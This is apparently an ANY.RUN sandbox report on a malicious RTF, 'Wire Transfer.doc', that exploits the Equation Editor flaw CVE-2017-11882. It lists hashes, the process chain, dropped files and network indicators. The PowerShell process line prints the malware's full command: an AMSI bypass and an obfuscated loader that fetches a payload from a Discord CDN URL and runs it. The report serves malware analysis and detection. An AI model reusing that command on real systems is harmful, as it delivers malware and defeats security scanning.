analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Wire Transfer.doc

Full analysis: https://app.any.run/tasks/939c83d4-1757-45a2-9eb3-125f750e7327
Verdict: Malicious activity
Analysis date: January 24, 2022, 22:41:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
exploit
CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

673A38847B61702DFFFE16F3EF663E6E

SHA1:

E5ACCBCE7AC7CDD8739270E9B392AC587B0DD1C7

SHA256:

2D11902F0163D96CE589DB1484C7A50AC7FB31195881B45D7135E64F6D5B8FBC

SSDEEP:

1536:u264J3fbgjEHezPzjbzOz2zgz1zjbzezmbz+zazKzgzuzmz/zxzEzzzezmbz+zab:08JQp8JHG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2736)

  • SUSPICIOUS

    • Checks supported languages

      • EQNEDT32.EXE (PID: 2736)
      • cscript.exe (PID: 2640)
      • CmD.exe (PID: 2496)
      • Powershell.exe (PID: 1272)

    • Reads the computer name

      • EQNEDT32.EXE (PID: 2736)
      • cscript.exe (PID: 2640)
      • Powershell.exe (PID: 1272)

    • Executed via COM

      • EQNEDT32.EXE (PID: 2736)

    • Executes scripts

      • CmD.exe (PID: 2496)

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 2736)

    • Executed via WMI

      • Powershell.exe (PID: 1272)

    • Reads Environment values

      • Powershell.exe (PID: 1272)

    • PowerShell script executed

      • Powershell.exe (PID: 1272)

  • INFO

    • Checks supported languages

      • WINWORD.EXE (PID: 3004)

    • Reads the computer name

      • WINWORD.EXE (PID: 3004)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3004)

    • Checks Windows Trust Settings

      • cscript.exe (PID: 2640)
      • Powershell.exe (PID: 1272)

    • Reads settings of System Certificates

      • Powershell.exe (PID: 1272)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3004)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe cmd.exe no specs cscript.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3004"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Wire Transfer.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2736"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2496CmD.exe /C cscript %tmp%\Client.vbs A CC:\Windows\system32\CmD.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2640cscript C:\Users\admin\AppData\Local\Temp\Client.vbs A CC:\Windows\system32\cscript.exeCmD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft � Console Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1272Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$2703183199940741270318319994074127031831999407412703183199940741=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,57,51,50,55,48,51,49,56,51,49,57,57,57,52,48,55,52,49,47,57,51,50,55,48,51,51,53,52,54,50,57,53,50,57,54,49,48,47,104,105,116,101,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($2703183199940741270318319994074127031831999407412703183199940741)|I`E`XC:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Total events
8 393
Read events
7 590
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
6
Text files
3
Unknown types
6

Dropped files

PID
Process
Filename
Type
3004WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE90B.tmp.cvr
MD5:
SHA256:
3004WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:CE122B43DC34F0399FBCA8E567EE9593
SHA256:1B48569C8D636659775125BFE94FCD01E7C308AA6F3C3046449693E6EBB2A790
1272Powershell.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27der
MD5:494A7483CEAF488A79CB45418E88ECCD
SHA256:9A65904F97742B3D8844EFAFCE7D9E9DA7C1B96A8FDE541E718768AE68293D50
1272Powershell.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27binary
MD5:5E9D892D37BBC20F7CF44052FCB3AA41
SHA256:7EFEBF17C89B2289BBF3E8BD9AB35CDAAC896C2A5AD4982CC84A46BBAF0F0520
3004WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Client.vbstext
MD5:7D62B9B3DF8CDAF06DE881AD1860055D
SHA256:A313613D88053A4F6FAF988750597BA309DE2C2F34CD8709AF2AD059FC65D983
3004WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Wire Transfer.doc.rtf.LNKlnk
MD5:96CE7D8EEEBBC4A9F73F568E56609F68
SHA256:41B5135ADC95408A3C2DE71B3EC77E529820956FEBD8A68F8BE6FF4B6229909A
3004WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:2162A46B7EA6C1B7E2B09C82EAAB3B2D
SHA256:41044CEA93FF833689EC75C5324B6308A2FF05A9E281AD22B1D381CC13959620
1272Powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:D3C284009A5790C3AA90D7C5D620CA65
SHA256:6C12FFF497059706D50431BB47C624FA24A8A7F9B6D52B2AB251FDC588E00E39
3004WINWORD.EXEC:\Users\admin\Desktop\~$re Transfer.doc.rtfpgc
MD5:4A6E0F4C8554F831FADC33D70743A855
SHA256:4F4A1BCF31B2172F1078E3FDA26AF6AC4D0AB301CFC8205B79A804432B38B3E2
1272Powershell.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:EBF8534A419964083D677BE1752E698F
SHA256:0A71C911903867C9B10B15FFC233EC332C4AA857D6E6190C0583B24B23B78D8E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
5
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1272
Powershell.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D
US
der
1.47 Kb
whitelisted
1272
Powershell.exe
GET
200
93.184.221.240:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6d268db0aaec37f7
US
compressed
4.70 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1272
Powershell.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1272
Powershell.exe
162.159.135.233:443
cdn.discordapp.com
Cloudflare Inc
shared
1272
Powershell.exe
93.184.221.240:80
ctldl.windowsupdate.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1272
Powershell.exe
162.159.129.233:443
cdn.discordapp.com
Cloudflare Inc
shared

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.174
whitelisted
cdn.discordapp.com
  • 162.159.129.233
  • 162.159.135.233
  • 162.159.130.233
  • 162.159.134.233
  • 162.159.133.233
shared
ctldl.windowsupdate.com
  • 93.184.221.240
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Wire Transfer.doc